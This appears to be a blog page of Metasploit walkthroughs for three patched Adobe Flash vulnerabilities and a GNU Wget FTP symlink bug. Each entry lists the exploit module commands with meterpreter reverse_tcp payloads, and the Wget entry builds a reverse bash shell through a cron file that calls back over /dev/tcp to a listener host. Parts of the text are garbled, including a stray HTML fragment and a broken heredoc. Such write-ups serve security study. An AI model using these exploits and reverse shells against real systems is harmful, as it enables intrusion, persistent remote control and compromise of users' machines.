Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2015-0318 Adobe Flash Player PCRE Regex Vulnerability

Timeline :

Vulnerability discovered and reported to the vendor by Mark Brand and Natalie Silvanovich of Google Project Zero the 2014-11-25
Patched by the vendor through APSB15-04 the 2015-02-05
Details of the vulnerability provided by Google Project Zero the 2015-02-12

PoC provided by :

Mark Brand
sinn3r

Reference(s) :

CVE-2015-0318
APSB15-04

Affected version(s) :

Adobe Flash Player 16.0.0.296 and earlier versions

Tested on :

Windows 7 SP1 with Internet Explorer 8 and Adobe Flash Player 16.0.0.235

Description :

This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error in the PCRE engine, specifically in the handling of the \c escape sequence when followed by a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.

Commands :

use exploit/windows/browser/adobe_flash_pcre
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

CVE-2015-0311 Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free

Timeline :

Vulnerability discovered exploited in the wild the 2015-01-21
Patched by the vendor the 2015-01-22
Metasploit PoC provided the 2015-03-09

PoC provided by :

Unknown
hdarwin
juan vazquez

Reference(s) :

CVE-2015-0311
APSA15-01

Affected version(s) :

Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh
Adobe Flash Player 13.0.0.262 and earlier 13.x versions
Adobe Flash Player 11.2.202.438 and earlier versions for Linux

Tested on :

Windows 7 SP1 and Internet Explorer 8 with Adobe Flash Player 16.0.0.287

Description :

This module exploits a use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress() a malformed byte stream. This module has been tested successfully on:
* Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235. * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.287.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.
* Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Flash 11.2.202.424.

Commands :

use exploit/multi/browser/adobe_flash_uncompress_zlib_uaf
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

CVE-2015-0359 Adobe Flash Player domainMemory ByteArray Use After Free

Timeline :

Vulnerability discovered by bilou and reported to Chromium VRP
Patched by the vendor the 2015-04-14
Vulnerability discovered integrated into exploit kit the 2015-04-17
PoC provided by unknown and hdarwin the 2015-05-02
Metasploit PoC provided the 2015-05-08

PoC provided by :

bilou
Unknown
hdarwin
juan vazquez

Reference(s) :

CVE-2015-0359
APSB15-06

Affected version(s) :

Adobe Flash Player 17.0.0.134 and earlier versions

Tested on :

Windows 7 SP1 and Internet Explorer 8 with Adobe Flash 17.0.0.134

Description :

This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, when forcing a reallocation by copying more contents than the original capacity, but Flash forgets to update the domainMemory pointer, leading to a use-after-free situation when the main worker references the domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 17.0.0.134.

Commands :

use exploit/windows/browser/adobe_flash_domain_memory_uaf
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

llowfullscreen=”allowfullscreen”>

CVE-2014-4877 GNU Wget FTP Symlink Arbitrary Filesystem Access

Timeline :

Vulnerability discovered by hdm the 2014-08-24
Vulnerability notified to vendor the 2014-08-24
Patched by the vendor the 2014-09-01
Advisory release the 2014-10-27
Metasploit PoC provided the 2014-10-27

PoC provided by :

HD Moore of Rapid7

Reference(s) :

CVE-2014-4877

Affected version(s) :

All GNU Wget before version 1.16

Tested on :

Ubuntu Server 12.10 with GNU Wget version 1.13.4 and root user

Description :

This module exploits a vulnerability in Wget when used in recursive (-r) mode with a FTP server as a destination. A symlink is used to allow arbitrary writes to the target’s filesystem. To specify content for the file, use the “file:/path” syntax for the TARGET_DATA option. Tested successfully with wget 1.14. Versions prior to 1.16 are presumed vulnerable.

Commands :

1. Create a reverse bash payload

msfvenom -p cmd/unix/reverse_bash -f raw LHOST=192.168.6.138

2. Create a crontab file that run once a minute, that launches the bellow command

cat>cronshell /dev/tcp/192.168.6.138/4444;sh <&148 >&148 2>&148’; rm -f /etc/cron.d/cronshell
EOD

3. Run a shell listener in Metasploit

use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_bash
set LHOST 192.168.6.138
run -j

4. Run the wget_symlink_file_write Metasploit module

use auxiliary/server/wget_symlink_file_write
set SRVHOST 192.168.6.138
set TARGET_FILE /etc/cron.d/cronshell
set TARGET_DATA file:/root/cronshell
set SRVPORT 21
run

5. On victim machine execute the bellow command

wget -m ftp://192.168.6.138:21/

6. Get the Metasploit session

session -i 1

id
uname -a

Go to Top